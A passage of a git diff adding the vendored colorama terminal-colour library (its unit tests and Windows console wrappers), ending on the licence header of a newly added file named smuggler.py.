wrapped_stderr is not None: + sys.stderr = wrapped_stderr + + +def wrap_stream(stream, convert, strip, autoreset, wrap): + if wrap: + wrapper = AnsiToWin32(stream, + convert=convert, strip=strip, autoreset=autoreset) + if wrapper.should_wrap(): + stream = wrapper.stream + return stream diff --git a/lib/colorama/tests/__init__.py b/lib/colorama/tests/__init__.py new file mode 100644 index 0000000..8c5661e --- /dev/null +++ b/lib/colorama/tests/__init__.py @@ -0,0 +1 @@ +# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. diff --git a/lib/colorama/tests/ansi_test.py b/lib/colorama/tests/ansi_test.py new file mode 100644 index 0000000..0a20c80 --- /dev/null +++ b/lib/colorama/tests/ansi_test.py @@ -0,0 +1,76 @@ +# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. +import sys +from unittest import TestCase, main + +from ..ansi import Back, Fore, Style +from ..ansitowin32 import AnsiToWin32 + +stdout_orig = sys.stdout +stderr_orig = sys.stderr + + +class AnsiTest(TestCase): + + def setUp(self): + # sanity check: stdout should be a file or StringIO object. + # It will only be AnsiToWin32 if init() has previously wrapped it + self.assertNotEqual(type(sys.stdout), AnsiToWin32) + self.assertNotEqual(type(sys.stderr), AnsiToWin32) + + def tearDown(self): + sys.stdout = stdout_orig + sys.stderr = stderr_orig + + + def testForeAttributes(self): + self.assertEqual(Fore.BLACK, '\033[30m') + self.assertEqual(Fore.RED, '\033[31m') + self.assertEqual(Fore.GREEN, '\033[32m') + self.assertEqual(Fore.YELLOW, '\033[33m') + self.assertEqual(Fore.BLUE, '\033[34m') + self.assertEqual(Fore.MAGENTA, '\033[35m') + self.assertEqual(Fore.CYAN, '\033[36m') + self.assertEqual(Fore.WHITE, '\033[37m') + self.assertEqual(Fore.RESET, '\033[39m') + + # Check the light, extended versions. + self.assertEqual(Fore.LIGHTBLACK_EX, '\033[90m') + self.assertEqual(Fore.LIGHTRED_EX, '\033[91m') + self.assertEqual(Fore.LIGHTGREEN_EX, '\033[92m') + self.assertEqual(Fore.LIGHTYELLOW_EX, '\033[93m') + self.assertEqual(Fore.LIGHTBLUE_EX, '\033[94m') + self.assertEqual(Fore.LIGHTMAGENTA_EX, '\033[95m') + self.assertEqual(Fore.LIGHTCYAN_EX, '\033[96m') + self.assertEqual(Fore.LIGHTWHITE_EX, '\033[97m') + + + def testBackAttributes(self): + self.assertEqual(Back.BLACK, '\033[40m') + self.assertEqual(Back.RED, '\033[41m') + self.assertEqual(Back.GREEN, '\033[42m') + self.assertEqual(Back.YELLOW, '\033[43m') + self.assertEqual(Back.BLUE, '\033[44m') + self.assertEqual(Back.MAGENTA, '\033[45m') + self.assertEqual(Back.CYAN, '\033[46m') + self.assertEqual(Back.WHITE, '\033[47m') + self.assertEqual(Back.RESET, '\033[49m') + + # Check the light, extended versions. + self.assertEqual(Back.LIGHTBLACK_EX, '\033[100m') + self.assertEqual(Back.LIGHTRED_EX, '\033[101m') + self.assertEqual(Back.LIGHTGREEN_EX, '\033[102m') + self.assertEqual(Back.LIGHTYELLOW_EX, '\033[103m') + self.assertEqual(Back.LIGHTBLUE_EX, '\033[104m') + self.assertEqual(Back.LIGHTMAGENTA_EX, '\033[105m') + self.assertEqual(Back.LIGHTCYAN_EX, '\033[106m') + self.assertEqual(Back.LIGHTWHITE_EX, '\033[107m') + + + def testStyleAttributes(self): + self.assertEqual(Style.DIM, '\033[2m') + self.assertEqual(Style.NORMAL, '\033[22m') + self.assertEqual(Style.BRIGHT, '\033[1m') + + +if __name__ == '__main__': + main() diff --git a/lib/colorama/tests/ansitowin32_test.py b/lib/colorama/tests/ansitowin32_test.py new file mode 100644 index 0000000..33f25ae --- /dev/null +++ b/lib/colorama/tests/ansitowin32_test.py @@ -0,0 +1,208 @@ +# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. +from io import StringIO +from unittest import TestCase, main + +from mock import MagicMock, Mock, patch + +from ..ansitowin32 import AnsiToWin32, StreamWrapper +from .utils import osname + + +class StreamWrapperTest(TestCase): + + def testIsAProxy(self): + mockStream = Mock() + wrapper = StreamWrapper(mockStream, None) + self.assertTrue( wrapper.random_attr is mockStream.random_attr ) + + def testDelegatesWrite(self): + mockStream = Mock() + mockConverter = Mock() + wrapper = StreamWrapper(mockStream, mockConverter) + wrapper.write('hello') + self.assertTrue(mockConverter.write.call_args, (('hello',), {})) + + def testDelegatesContext(self): + mockConverter = Mock() + s = StringIO() + with StreamWrapper(s, mockConverter) as fp: + fp.write(u'hello') + self.assertTrue(s.closed) + + def testProxyNoContextManager(self): + mockStream = MagicMock() + mockStream.__enter__.side_effect = AttributeError() + mockConverter = Mock() + with self.assertRaises(AttributeError) as excinfo: + with StreamWrapper(mockStream, mockConverter) as wrapper: + wrapper.write('hello') + + +class AnsiToWin32Test(TestCase): + + def testInit(self): + mockStdout = Mock() + auto = Mock() + stream = AnsiToWin32(mockStdout, autoreset=auto) + self.assertEqual(stream.wrapped, mockStdout) + self.assertEqual(stream.autoreset, auto) + + @patch('colorama.ansitowin32.winterm', None) + @patch('colorama.ansitowin32.winapi_test', lambda *_: True) + def testStripIsTrueOnWindows(self): + with osname('nt'): + mockStdout = Mock() + stream = AnsiToWin32(mockStdout) + self.assertTrue(stream.strip) + + def testStripIsFalseOffWindows(self): + with osname('posix'): + mockStdout = Mock(closed=False) + stream = AnsiToWin32(mockStdout) + self.assertFalse(stream.strip) + + def testWriteStripsAnsi(self): + mockStdout = Mock() + stream = AnsiToWin32(mockStdout) + stream.wrapped = Mock() + stream.write_and_convert = Mock() + stream.strip = True + + stream.write('abc') + + self.assertFalse(stream.wrapped.write.called) + self.assertEqual(stream.write_and_convert.call_args, (('abc',), {})) + + def testWriteDoesNotStripAnsi(self): + mockStdout = Mock() + stream = AnsiToWin32(mockStdout) + stream.wrapped = Mock() + stream.write_and_convert = Mock() + stream.strip = False + stream.convert = False + + stream.write('abc') + + self.assertFalse(stream.write_and_convert.called) + self.assertEqual(stream.wrapped.write.call_args, (('abc',), {})) + + def assert_autoresets(self, convert, autoreset=True): + stream = AnsiToWin32(Mock()) + stream.convert = convert + stream.reset_all = Mock() + stream.autoreset = autoreset + stream.winterm = Mock() + + stream.write('abc') + + self.assertEqual(stream.reset_all.called, autoreset) + + def testWriteAutoresets(self): + self.assert_autoresets(convert=True) + self.assert_autoresets(convert=False) + self.assert_autoresets(convert=True, autoreset=False) + self.assert_autoresets(convert=False, autoreset=False) + + def testWriteAndConvertWritesPlainText(self): + stream = AnsiToWin32(Mock()) + stream.write_and_convert( 'abc' ) + self.assertEqual( stream.wrapped.write.call_args, (('abc',), {}) ) + + def testWriteAndConvertStripsAllValidAnsi(self): + stream = AnsiToWin32(Mock()) + stream.call_win32 = Mock() + data = [ + 'abc\033[mdef', + 'abc\033[0mdef', + 'abc\033[2mdef', + 'abc\033[02mdef', + 'abc\033[002mdef', + 'abc\033[40mdef', + 'abc\033[040mdef', + 'abc\033[0;1mdef', + 'abc\033[40;50mdef', + 'abc\033[50;30;40mdef', + 'abc\033[Adef', + 'abc\033[0Gdef', + 'abc\033[1;20;128Hdef', + ] + for datum in data: + stream.wrapped.write.reset_mock() + stream.write_and_convert( datum ) + self.assertEqual( + [args[0] for args in stream.wrapped.write.call_args_list], + [ ('abc',), ('def',) ] + ) + + def testWriteAndConvertSkipsEmptySnippets(self): + stream = AnsiToWin32(Mock()) + stream.call_win32 = Mock() + stream.write_and_convert( '\033[40m\033[41m' ) + self.assertFalse( stream.wrapped.write.called ) + + def testWriteAndConvertCallsWin32WithParamsAndCommand(self): + stream = AnsiToWin32(Mock()) + stream.convert = True + stream.call_win32 = Mock() + stream.extract_params = Mock(return_value='params') + data = { + 'abc\033[adef': ('a', 'params'), + 'abc\033[;;bdef': ('b', 'params'), + 'abc\033[0cdef': ('c', 'params'), + 'abc\033[;;0;;Gdef': ('G', 'params'), + 'abc\033[1;20;128Hdef': ('H', 'params'), + } + for datum, expected in data.items(): + stream.call_win32.reset_mock() + stream.write_and_convert( datum ) + self.assertEqual( stream.call_win32.call_args[0], expected ) + + def test_reset_all_shouldnt_raise_on_closed_orig_stdout(self): + stream = StringIO() + converter = AnsiToWin32(stream) + stream.close() + + converter.reset_all() + + def test_wrap_shouldnt_raise_on_closed_orig_stdout(self): + stream = StringIO() + stream.close() + converter = AnsiToWin32(stream) + self.assertFalse(converter.strip) + self.assertFalse(converter.convert) + + def test_wrap_shouldnt_raise_on_missing_closed_attr(self): + converter = AnsiToWin32(object()) + self.assertFalse(converter.strip) + self.assertFalse(converter.convert) + + def testExtractParams(self): + stream = AnsiToWin32(Mock()) + data = { + '': (0,), + ';;': (0,), + '2': (2,), + ';;002;;': (2,), + '0;1': (0, 1), + ';;003;;456;;': (3, 456), + '11;22;33;44;55': (11, 22, 33, 44, 55), + } + for datum, expected in data.items(): + self.assertEqual(stream.extract_params('m', datum), expected) + + def testCallWin32UsesLookup(self): + listener = Mock() + stream = AnsiToWin32(listener) + stream.win32_calls = { + 1: (lambda *_, **__: listener(11),), + 2: (lambda *_, **__: listener(22),), + 3: (lambda *_, **__: listener(33),), + } + stream.call_win32('m', (3, 1, 99, 2)) + self.assertEqual( + [a[0][0] for a in listener.call_args_list], + [33, 11, 22] ) + + +if __name__ == '__main__': + main() diff --git a/lib/colorama/tests/initialise_test.py b/lib/colorama/tests/initialise_test.py new file mode 100644 index 0000000..2f7384d --- /dev/null +++ b/lib/colorama/tests/initialise_test.py @@ -0,0 +1,123 @@ +# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. +import os +import sys +from unittest import TestCase, main + +from mock import patch + +from ..ansitowin32 import StreamWrapper +from ..initialise import init +from .utils import osname, redirected_output, replace_by + +orig_stdout = sys.stdout +orig_stderr = sys.stderr + + +class InitTest(TestCase): + + def setUp(self): + # sanity check + self.assertNotWrapped() + + def tearDown(self): + sys.stdout = orig_stdout + sys.stderr = orig_stderr + + def assertWrapped(self): + self.assertIsNot(sys.stdout, orig_stdout, 'stdout should be wrapped') + self.assertIsNot(sys.stderr, orig_stderr, 'stderr should be wrapped') + self.assertTrue(isinstance(sys.stdout, StreamWrapper), + 'bad stdout wrapper') + self.assertTrue(isinstance(sys.stderr, StreamWrapper), + 'bad stderr wrapper') + + def assertNotWrapped(self): + self.assertIs(sys.stdout, orig_stdout, 'stdout should not be wrapped') + self.assertIs(sys.stderr, orig_stderr, 'stderr should not be wrapped') + + @patch('colorama.initialise.reset_all') + @patch('colorama.ansitowin32.winapi_test', lambda *_: True) + def testInitWrapsOnWindows(self, _): + with osname("nt"): + init() + self.assertWrapped() + + @patch('colorama.initialise.reset_all') + @patch('colorama.ansitowin32.winapi_test', lambda *_: False) + def testInitDoesntWrapOnEmulatedWindows(self, _): + with osname("nt"): + init() + self.assertNotWrapped() + + def testInitDoesntWrapOnNonWindows(self): + with osname("posix"): + init() + self.assertNotWrapped() + + def testInitDoesntWrapIfNone(self): + with replace_by(None): + init() + # We can't use assertNotWrapped here because replace_by(None) + # changes stdout/stderr already. + self.assertIsNone(sys.stdout) + self.assertIsNone(sys.stderr) + + def testInitAutoresetOnWrapsOnAllPlatforms(self): + with osname("posix"): + init(autoreset=True) + self.assertWrapped() + + def testInitWrapOffDoesntWrapOnWindows(self): + with osname("nt"): + init(wrap=False) + self.assertNotWrapped() + + def testInitWrapOffIncompatibleWithAutoresetOn(self): + self.assertRaises(ValueError, lambda: init(autoreset=True, wrap=False)) + + @patch('colorama.ansitowin32.winterm', None) + @patch('colorama.ansitowin32.winapi_test', lambda *_: True) + def testInitOnlyWrapsOnce(self): + with osname("nt"): + init() + init() + self.assertWrapped() + + @patch('colorama.win32.SetConsoleTextAttribute') + @patch('colorama.initialise.AnsiToWin32') + def testAutoResetPassedOn(self, mockATW32, _): + with osname("nt"): + init(autoreset=True) + self.assertEqual(len(mockATW32.call_args_list), 2) + self.assertEqual(mockATW32.call_args_list[1][1]['autoreset'], True) + self.assertEqual(mockATW32.call_args_list[0][1]['autoreset'], True) + + @patch('colorama.initialise.AnsiToWin32') + def testAutoResetChangeable(self, mockATW32): + with osname("nt"): + init() + + init(autoreset=True) + self.assertEqual(len(mockATW32.call_args_list), 4) + self.assertEqual(mockATW32.call_args_list[2][1]['autoreset'], True) + self.assertEqual(mockATW32.call_args_list[3][1]['autoreset'], True) + + init() + self.assertEqual(len(mockATW32.call_args_list), 6) + self.assertEqual( + mockATW32.call_args_list[4][1]['autoreset'], False) + self.assertEqual( + mockATW32.call_args_list[5][1]['autoreset'], False) + + + @patch('colorama.initialise.atexit.register') + def testAtexitRegisteredOnlyOnce(self, mockRegister): + init() + self.assertTrue(mockRegister.called) + mockRegister.reset_mock() + init() + self.assertFalse(mockRegister.called) + + +if __name__ == '__main__': + main() diff --git a/lib/colorama/tests/isatty_test.py b/lib/colorama/tests/isatty_test.py new file mode 100644 index 0000000..0f84e4b --- /dev/null +++ b/lib/colorama/tests/isatty_test.py @@ -0,0 +1,57 @@ +# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. +import sys +from unittest import TestCase, main + +from ..ansitowin32 import StreamWrapper, AnsiToWin32 +from .utils import pycharm, replace_by, replace_original_by, StreamTTY, StreamNonTTY + + +def is_a_tty(stream): + return StreamWrapper(stream, None).isatty() + +class IsattyTest(TestCase): + + def test_TTY(self): + tty = StreamTTY() + self.assertTrue(is_a_tty(tty)) + with pycharm(): + self.assertTrue(is_a_tty(tty)) + + def test_nonTTY(self): + non_tty = StreamNonTTY() + self.assertFalse(is_a_tty(non_tty)) + with pycharm(): + self.assertFalse(is_a_tty(non_tty)) + + def test_withPycharm(self): + with pycharm(): + self.assertTrue(is_a_tty(sys.stderr)) + self.assertTrue(is_a_tty(sys.stdout)) + + def test_withPycharmTTYOverride(self): + tty = StreamTTY() + with pycharm(), replace_by(tty): + self.assertTrue(is_a_tty(tty)) + + def test_withPycharmNonTTYOverride(self): + non_tty = StreamNonTTY() + with pycharm(), replace_by(non_tty): + self.assertFalse(is_a_tty(non_tty)) + + def test_withPycharmNoneOverride(self): + with pycharm(): + with replace_by(None), replace_original_by(None): + self.assertFalse(is_a_tty(None)) + self.assertFalse(is_a_tty(StreamNonTTY())) + self.assertTrue(is_a_tty(StreamTTY())) + + def test_withPycharmStreamWrapped(self): + with pycharm(): + self.assertTrue(AnsiToWin32(StreamTTY()).stream.isatty()) + self.assertFalse(AnsiToWin32(StreamNonTTY()).stream.isatty()) + self.assertTrue(AnsiToWin32(sys.stdout).stream.isatty()) + self.assertTrue(AnsiToWin32(sys.stderr).stream.isatty()) + + +if __name__ == '__main__': + main() diff --git a/lib/colorama/tests/utils.py b/lib/colorama/tests/utils.py new file mode 100644 index 0000000..de2abf5 --- /dev/null +++ b/lib/colorama/tests/utils.py @@ -0,0 +1,58 @@ +# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. +from contextlib import contextmanager +from io import StringIO +import sys +import os + +from mock import Mock + +class StreamTTY(StringIO): + def isatty(self): + return True + +class StreamNonTTY(StringIO): + def isatty(self): + return False + +@contextmanager +def osname(name): + orig = os.name + os.name = name + yield + os.name = orig + +@contextmanager +def redirected_output(): + orig = sys.stdout + sys.stdout = Mock() + sys.stdout.isatty = lambda: False + yield + sys.stdout = orig + +@contextmanager +def replace_by(stream): + orig_stdout = sys.stdout + orig_stderr = sys.stderr + sys.stdout = stream + sys.stderr = stream + yield + sys.stdout = orig_stdout + sys.stderr = orig_stderr + +@contextmanager +def replace_original_by(stream): + orig_stdout = sys.__stdout__ + orig_stderr = sys.__stderr__ + sys.__stdout__ = stream + sys.__stderr__ = stream + yield + sys.__stdout__ = orig_stdout + sys.__stderr__ = orig_stderr + +@contextmanager +def pycharm(): + os.environ["PYCHARM_HOSTED"] = "1" + non_tty = StreamNonTTY() + with replace_by(non_tty), replace_original_by(non_tty): + yield + del os.environ["PYCHARM_HOSTED"] diff --git a/lib/colorama/tests/winterm_test.py b/lib/colorama/tests/winterm_test.py new file mode 100644 index 0000000..1c8c6c7 --- /dev/null +++ b/lib/colorama/tests/winterm_test.py @@ -0,0 +1,128 @@ +# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. +import sys +from unittest import TestCase, main, skipUnless + +from mock import Mock, patch + +from ..winterm import WinColor, WinStyle, WinTerm + + +class WinTermTest(TestCase): + + @patch('colorama.winterm.win32') + def testInit(self, mockWin32): + mockAttr = Mock() + mockAttr.wAttributes = 7 + 6 * 16 + 8 + mockWin32.GetConsoleScreenBufferInfo.return_value = mockAttr + term = WinTerm() + self.assertEqual(term._fore, 7) + self.assertEqual(term._back, 6) + self.assertEqual(term._style, 8) + + @skipUnless(sys.platform.startswith("win"), "requires Windows") + def testGetAttrs(self): + term = WinTerm() + + term._fore = 0 + term._back = 0 + term._style = 0 + self.assertEqual(term.get_attrs(), 0) + + term._fore = WinColor.YELLOW + self.assertEqual(term.get_attrs(), WinColor.YELLOW) + + term._back = WinColor.MAGENTA + self.assertEqual( + term.get_attrs(), + WinColor.YELLOW + WinColor.MAGENTA * 16) + + term._style = WinStyle.BRIGHT + self.assertEqual( + term.get_attrs(), + WinColor.YELLOW + WinColor.MAGENTA * 16 + WinStyle.BRIGHT) + + @patch('colorama.winterm.win32') + def testResetAll(self, mockWin32): + mockAttr = Mock() + mockAttr.wAttributes = 1 + 2 * 16 + 8 + mockWin32.GetConsoleScreenBufferInfo.return_value = mockAttr + term = WinTerm() + + term.set_console = Mock() + term._fore = -1 + term._back = -1 + term._style = -1 + + term.reset_all() + + self.assertEqual(term._fore, 1) + self.assertEqual(term._back, 2) + self.assertEqual(term._style, 8) + self.assertEqual(term.set_console.called, True) + + @skipUnless(sys.platform.startswith("win"), "requires Windows") + def testFore(self): + term = WinTerm() + term.set_console = Mock() + term._fore = 0 + + term.fore(5) + + self.assertEqual(term._fore, 5) + self.assertEqual(term.set_console.called, True) + + @skipUnless(sys.platform.startswith("win"), "requires Windows") + def testBack(self): + term = WinTerm() + term.set_console = Mock() + term._back = 0 + + term.back(5) + + self.assertEqual(term._back, 5) + self.assertEqual(term.set_console.called, True) + + @skipUnless(sys.platform.startswith("win"), "requires Windows") + def testStyle(self): + term = WinTerm() + term.set_console = Mock() + term._style = 0 + + term.style(22) + + self.assertEqual(term._style, 22) + self.assertEqual(term.set_console.called, True) + + @patch('colorama.winterm.win32') + def testSetConsole(self, mockWin32): + mockAttr = Mock() + mockAttr.wAttributes = 0 + mockWin32.GetConsoleScreenBufferInfo.return_value = mockAttr + term = WinTerm() + term.windll = Mock() + + term.set_console() + + self.assertEqual( + mockWin32.SetConsoleTextAttribute.call_args, + ((mockWin32.STDOUT, term.get_attrs()), {}) + ) + + @patch('colorama.winterm.win32') + def testSetConsoleOnStderr(self, mockWin32): + mockAttr = Mock() + mockAttr.wAttributes = 0 + mockWin32.GetConsoleScreenBufferInfo.return_value = mockAttr + term = WinTerm() + term.windll = Mock() + + term.set_console(on_stderr=True) + + self.assertEqual( + mockWin32.SetConsoleTextAttribute.call_args, + ((mockWin32.STDERR, term.get_attrs()), {}) + ) + + +if __name__ == '__main__': + main() diff --git a/lib/colorama/win32.py b/lib/colorama/win32.py new file mode 100644 index 0000000..c2d8360 --- /dev/null +++ b/lib/colorama/win32.py @@ -0,0 +1,152 @@ +# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. + +# from winbase.h +STDOUT = -11 +STDERR = -12 + +try: + import ctypes + from ctypes import LibraryLoader + windll = LibraryLoader(ctypes.WinDLL) + from ctypes import wintypes +except (AttributeError, ImportError): + windll = None + SetConsoleTextAttribute = lambda *_: None + winapi_test = lambda *_: None +else: + from ctypes import byref, Structure, c_char, POINTER + + COORD = wintypes._COORD + + class CONSOLE_SCREEN_BUFFER_INFO(Structure): + """struct in wincon.h.""" + _fields_ = [ + ("dwSize", COORD), + ("dwCursorPosition", COORD), + ("wAttributes", wintypes.WORD), + ("srWindow", wintypes.SMALL_RECT), + ("dwMaximumWindowSize", COORD), + ] + def __str__(self): + return '(%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d)' % ( + self.dwSize.Y, self.dwSize.X + , self.dwCursorPosition.Y, self.dwCursorPosition.X + , self.wAttributes + , self.srWindow.Top, self.srWindow.Left, self.srWindow.Bottom, self.srWindow.Right + , self.dwMaximumWindowSize.Y, self.dwMaximumWindowSize.X + ) + + _GetStdHandle = windll.kernel32.GetStdHandle + _GetStdHandle.argtypes = [ + wintypes.DWORD, + ] + _GetStdHandle.restype = wintypes.HANDLE + + _GetConsoleScreenBufferInfo = windll.kernel32.GetConsoleScreenBufferInfo + _GetConsoleScreenBufferInfo.argtypes = [ + wintypes.HANDLE, + POINTER(CONSOLE_SCREEN_BUFFER_INFO), + ] + _GetConsoleScreenBufferInfo.restype = wintypes.BOOL + + _SetConsoleTextAttribute = windll.kernel32.SetConsoleTextAttribute + _SetConsoleTextAttribute.argtypes = [ + wintypes.HANDLE, + wintypes.WORD, + ] + _SetConsoleTextAttribute.restype = wintypes.BOOL + + _SetConsoleCursorPosition = windll.kernel32.SetConsoleCursorPosition + _SetConsoleCursorPosition.argtypes = [ + wintypes.HANDLE, + COORD, + ] + _SetConsoleCursorPosition.restype = wintypes.BOOL + + _FillConsoleOutputCharacterA = windll.kernel32.FillConsoleOutputCharacterA + _FillConsoleOutputCharacterA.argtypes = [ + wintypes.HANDLE, + c_char, + wintypes.DWORD, + COORD, + POINTER(wintypes.DWORD), + ] + _FillConsoleOutputCharacterA.restype = wintypes.BOOL + + _FillConsoleOutputAttribute = windll.kernel32.FillConsoleOutputAttribute + _FillConsoleOutputAttribute.argtypes = [ + wintypes.HANDLE, + wintypes.WORD, + wintypes.DWORD, + COORD, + POINTER(wintypes.DWORD), + ] + _FillConsoleOutputAttribute.restype = wintypes.BOOL + + _SetConsoleTitleW = windll.kernel32.SetConsoleTitleW + _SetConsoleTitleW.argtypes = [ + wintypes.LPCWSTR + ] + _SetConsoleTitleW.restype = wintypes.BOOL + + def _winapi_test(handle): + csbi = CONSOLE_SCREEN_BUFFER_INFO() + success = _GetConsoleScreenBufferInfo( + handle, byref(csbi)) + return bool(success) + + def winapi_test(): + return any(_winapi_test(h) for h in + (_GetStdHandle(STDOUT), _GetStdHandle(STDERR))) + + def GetConsoleScreenBufferInfo(stream_id=STDOUT): + handle = _GetStdHandle(stream_id) + csbi = CONSOLE_SCREEN_BUFFER_INFO() + success = _GetConsoleScreenBufferInfo( + handle, byref(csbi)) + return csbi + + def SetConsoleTextAttribute(stream_id, attrs): + handle = _GetStdHandle(stream_id) + return _SetConsoleTextAttribute(handle, attrs) + + def SetConsoleCursorPosition(stream_id, position, adjust=True): + position = COORD(*position) + # If the position is out of range, do nothing. + if position.Y <= 0 or position.X <= 0: + return + # Adjust for Windows' SetConsoleCursorPosition: + # 1. being 0-based, while ANSI is 1-based. + # 2. expecting (x,y), while ANSI uses (y,x). + adjusted_position = COORD(position.Y - 1, position.X - 1) + if adjust: + # Adjust for viewport's scroll position + sr = GetConsoleScreenBufferInfo(STDOUT).srWindow + adjusted_position.Y += sr.Top + adjusted_position.X += sr.Left + # Resume normal processing + handle = _GetStdHandle(stream_id) + return _SetConsoleCursorPosition(handle, adjusted_position) + + def FillConsoleOutputCharacter(stream_id, char, length, start): + handle = _GetStdHandle(stream_id) + char = c_char(char.encode()) + length = wintypes.DWORD(length) + num_written = wintypes.DWORD(0) + # Note that this is hard-coded for ANSI (vs wide) bytes. + success = _FillConsoleOutputCharacterA( + handle, char, length, start, byref(num_written)) + return num_written.value + + def FillConsoleOutputAttribute(stream_id, attr, length, start): + ''' FillConsoleOutputAttribute( hConsole, csbi.wAttributes, dwConSize, coordScreen, &cCharsWritten )''' + handle = _GetStdHandle(stream_id) + attribute = wintypes.WORD(attr) + length = wintypes.DWORD(length) + num_written = wintypes.DWORD(0) + # Note that this is hard-coded for ANSI (vs wide) bytes. + return _FillConsoleOutputAttribute( + handle, attribute, length, start, byref(num_written)) + + def SetConsoleTitle(title): + return _SetConsoleTitleW(title) diff --git a/lib/colorama/winterm.py b/lib/colorama/winterm.py new file mode 100644 index 0000000..0fdb4ec --- /dev/null +++ b/lib/colorama/winterm.py @@ -0,0 +1,169 @@ +# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. +from . import win32 + + +# from wincon.h +class WinColor(object): + BLACK = 0 + BLUE = 1 + GREEN = 2 + CYAN = 3 + RED = 4 + MAGENTA = 5 + YELLOW = 6 + GREY = 7 + +# from wincon.h +class WinStyle(object): + NORMAL = 0x00 # dim text, dim background + BRIGHT = 0x08 # bright text, dim background + BRIGHT_BACKGROUND = 0x80 # dim text, bright background + +class WinTerm(object): + + def __init__(self): + self._default = win32.GetConsoleScreenBufferInfo(win32.STDOUT).wAttributes + self.set_attrs(self._default) + self._default_fore = self._fore + self._default_back = self._back + self._default_style = self._style + # In order to emulate LIGHT_EX in windows, we borrow the BRIGHT style. + # So that LIGHT_EX colors and BRIGHT style do not clobber each other, + # we track them separately, since LIGHT_EX is overwritten by Fore/Back + # and BRIGHT is overwritten by Style codes. + self._light = 0 + + def get_attrs(self): + return self._fore + self._back * 16 + (self._style | self._light) + + def set_attrs(self, value): + self._fore = value & 7 + self._back = (value >> 4) & 7 + self._style = value & (WinStyle.BRIGHT | WinStyle.BRIGHT_BACKGROUND) + + def reset_all(self, on_stderr=None): + self.set_attrs(self._default) + self.set_console(attrs=self._default) + self._light = 0 + + def fore(self, fore=None, light=False, on_stderr=False): + if fore is None: + fore = self._default_fore + self._fore = fore + # Emulate LIGHT_EX with BRIGHT Style + if light: + self._light |= WinStyle.BRIGHT + else: + self._light &= ~WinStyle.BRIGHT + self.set_console(on_stderr=on_stderr) + + def back(self, back=None, light=False, on_stderr=False): + if back is None: + back = self._default_back + self._back = back + # Emulate LIGHT_EX with BRIGHT_BACKGROUND Style + if light: + self._light |= WinStyle.BRIGHT_BACKGROUND + else: + self._light &= ~WinStyle.BRIGHT_BACKGROUND + self.set_console(on_stderr=on_stderr) + + def style(self, style=None, on_stderr=False): + if style is None: + style = self._default_style + self._style = style + self.set_console(on_stderr=on_stderr) + + def set_console(self, attrs=None, on_stderr=False): + if attrs is None: + attrs = self.get_attrs() + handle = win32.STDOUT + if on_stderr: + handle = win32.STDERR + win32.SetConsoleTextAttribute(handle, attrs) + + def get_position(self, handle): + position = win32.GetConsoleScreenBufferInfo(handle).dwCursorPosition + # Because Windows coordinates are 0-based, + # and win32.SetConsoleCursorPosition expects 1-based. + position.X += 1 + position.Y += 1 + return position + + def set_cursor_position(self, position=None, on_stderr=False): + if position is None: + # I'm not currently tracking the position, so there is no default. + # position = self.get_position() + return + handle = win32.STDOUT + if on_stderr: + handle = win32.STDERR + win32.SetConsoleCursorPosition(handle, position) + + def cursor_adjust(self, x, y, on_stderr=False): + handle = win32.STDOUT + if on_stderr: + handle = win32.STDERR + position = self.get_position(handle) + adjusted_position = (position.Y + y, position.X + x) + win32.SetConsoleCursorPosition(handle, adjusted_position, adjust=False) + + def erase_screen(self, mode=0, on_stderr=False): + # 0 should clear from the cursor to the end of the screen. + # 1 should clear from the cursor to the beginning of the screen. + # 2 should clear the entire screen, and move cursor to (1,1) + handle = win32.STDOUT + if on_stderr: + handle = win32.STDERR + csbi = win32.GetConsoleScreenBufferInfo(handle) + # get the number of character cells in the current buffer + cells_in_screen = csbi.dwSize.X * csbi.dwSize.Y + # get number of character cells before current cursor position + cells_before_cursor = csbi.dwSize.X * csbi.dwCursorPosition.Y + csbi.dwCursorPosition.X + if mode == 0: + from_coord = csbi.dwCursorPosition + cells_to_erase = cells_in_screen - cells_before_cursor + elif mode == 1: + from_coord = win32.COORD(0, 0) + cells_to_erase = cells_before_cursor + elif mode == 2: + from_coord = win32.COORD(0, 0) + cells_to_erase = cells_in_screen + else: + # invalid mode + return + # fill the entire screen with blanks + win32.FillConsoleOutputCharacter(handle, ' ', cells_to_erase, from_coord) + # now set the buffer's attributes accordingly + win32.FillConsoleOutputAttribute(handle, self.get_attrs(), cells_to_erase, from_coord) + if mode == 2: + # put the cursor where needed + win32.SetConsoleCursorPosition(handle, (1, 1)) + + def erase_line(self, mode=0, on_stderr=False): + # 0 should clear from the cursor to the end of the line. + # 1 should clear from the cursor to the beginning of the line. + # 2 should clear the entire line. + handle = win32.STDOUT + if on_stderr: + handle = win32.STDERR + csbi = win32.GetConsoleScreenBufferInfo(handle) + if mode == 0: + from_coord = csbi.dwCursorPosition + cells_to_erase = csbi.dwSize.X - csbi.dwCursorPosition.X + elif mode == 1: + from_coord = win32.COORD(0, csbi.dwCursorPosition.Y) + cells_to_erase = csbi.dwCursorPosition.X + elif mode == 2: + from_coord = win32.COORD(0, csbi.dwCursorPosition.Y) + cells_to_erase = csbi.dwSize.X + else: + # invalid mode + return + # fill the entire screen with blanks + win32.FillConsoleOutputCharacter(handle, ' ', cells_to_erase, from_coord) + # now set the buffer's attributes accordingly + win32.FillConsoleOutputAttribute(handle, self.get_attrs(), cells_to_erase, from_coord) + + def set_title(self, title): + win32.SetConsoleTitle(title) diff --git a/smuggler.py b/smuggler.py new file mode 100644 index 0000000..f8f617b --- /dev/null +++ b/smuggler.py @@ -0,0 +1,460 @@ +#!/usr/bin/python3 +# MIT License +# +# Copyright (c) 2020 Evan Custodio +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED "AS IS", 